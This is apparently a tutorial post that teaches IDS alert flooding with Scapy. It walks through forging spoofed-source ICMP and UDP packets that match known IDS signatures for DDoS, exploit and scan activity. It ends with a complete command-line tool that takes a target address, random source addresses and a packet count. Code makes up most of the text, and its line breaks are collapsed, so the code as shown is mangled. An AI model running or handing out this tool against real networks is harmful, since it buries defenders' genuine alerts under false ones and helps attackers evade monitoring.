Mastering Spoofing IDS Alerts: A Guide Using Scapy and ICMP Packet Tricks

The so-called spoofing of an intrusion detection system operates on the principle of triggering IDS alerts by creating fake attack indicators, which overwhelm the target system with numerous warnings, making it difficult to make reasonable judgments. Using Scapy, this third-party Python library, one can effectively achieve the spoofing of an intrusion detection system.

First, analyze the alarm-triggering condition assuming it is a TFN probe: ICMP id is 678, ICMP type is 8, and if the content contains "lyshark", it triggers an alert. We only need to construct this ICMP packet and send it to the target host.

#!/usr/bin/python
#coding=utf-8
from scapy.all import *# Trigger a DDoS alertdef fuck_ddos(src, dst, iface, count):    pkt = IP(src=src, dst=dst) / ICMP(type=8, id=678) / Raw(load='lyshark')    send(pkt, iface=iface, count=count)    pkt = IP(src=src, dst=dst) / ICMP(type=0) / Raw(load='AAAAAAAAAA')    send(pkt, iface=iface, count=count)    pkt = IP(src=src, dst=dst) / UDP(dport=31335) / Raw(load='PONG')    send(pkt, iface=iface, count=count)    pkt = IP(src=src, dst=dst) / ICMP(type=0, id=456)    send(pkt, iface=iface, count=count)src = "192.168.1.100"dst = "192.168.1.200"iface = "eth0"count = 1fuck_ddos(src, dst, iface, count)

For example, when a specified byte sequence triggers an alert, to generate a packet containing this specified byte sequence, you can use the symbol \x followed by the hexadecimal value of the byte.

# Trigger exploits alertdef exploitTest(src, dst, iface, count):    pkt = IP(src=src, dst=dst) / UDP(dport=518) / Raw(load="\x01\x03\x00\x00\x00\x00\x00")    send(pkt, iface=iface, count=count)    pkt = IP(src=src, dst=dst) / UDP(dport=635) / Raw(load="^\xB0\x02\x89\x06\xFE\xC8")    send(pkt, iface=iface, count=count)

Next, forge and trigger a reconnaissance scan alert by ensuring our packet contains specific signature codes, which trigger the alert. Let’s construct it.

def scanTest(src, dst, iface, count):    pkt = IP(src=src, dst=dst) / UDP(dport=7) / Raw(load='cybercop')    send(pkt)    pkt = IP(src=src, dst=dst) / UDP(dport=10080) / Raw(load='Amanda')    send(pkt, iface=iface, count=count)

Finally, we consolidate the code to generate packets that can trigger DDoS, exploits, and reconnaissance scan alerts.

#coding=utf-8import optparsefrom scapy.all import *from random import randint# Trigger DDoS alertdef ddosTest(src, dst, iface, count):    pkt = IP(src=src, dst=dst) / ICMP(type=8, id=678) / Raw(load='lyshark')    send(pkt, iface=iface, count=count)    pkt = IP(src=src, dst=dst) / ICMP(type=0) / Raw(load='AAAAAAAAAA')    send(pkt, iface=iface, count=count)    pkt = IP(src=src, dst=dst) / UDP(dport=31335) / Raw(load='PONG')    send(pkt, iface=iface, count=count)    pkt = IP(src=src, dst=dst) / ICMP(type=0, id=456)    send(pkt, iface=iface, count=count)# Trigger exploits alertdef exploitTest(src, dst, iface, count):    pkt = IP(src=src, dst=dst) / UDP(dport=518) / Raw(load="\x01\x03\x00\x00\x00\x00")    send(pkt, iface=iface, count=count)    pkt = IP(src=src, dst=dst) / UDP(dport=635) / Raw(load="^\xB0\x02\x89\x06\xFE")    send(pkt, iface=iface, count=count)# Trigger reconnaissance scan alertdef scanTest(src, dst, iface, count):    pkt = IP(src=src, dst=dst) / UDP(dport=7) / Raw(load='cybercop')    send(pkt)    pkt = IP(src=src, dst=dst) / UDP(dport=10080) / Raw(load='Amanda')    send(pkt, iface=iface, count=count)if __name__ == '__main__':    #  -s parameter specifies the source address to send from, -c parameter specifies the number of times to send.    parser = optparse.OptionParser('main.py -i  -s  -t  -c ')    parser.add_option('-i', dest='iface', type='string', help='specify network interface')    parser.add_option('-s', dest='src', type='string', help='specify source address')    parser.add_option('-t', dest='tgt', type='string', help='specify target address')    parser.add_option('-c', dest='count', type='int', help='specify packet count')    (options, args) = parser.parse_args()    if options.iface == None:        iface = 'eth0'    else:        iface = options.iface    if options.src == None:        src = '.'.join([str(randint(1,254)) for x in range(4)])    else:        src = options.src    if options.tgt == None:        exit(0)    else:        dst = options.tgt    if options.count == None:        count = 1    else:        count = options.count    ddosTest(src, dst, iface, count)    exploitTest(src, dst, iface, count)    scanTest(src, dst, iface, count)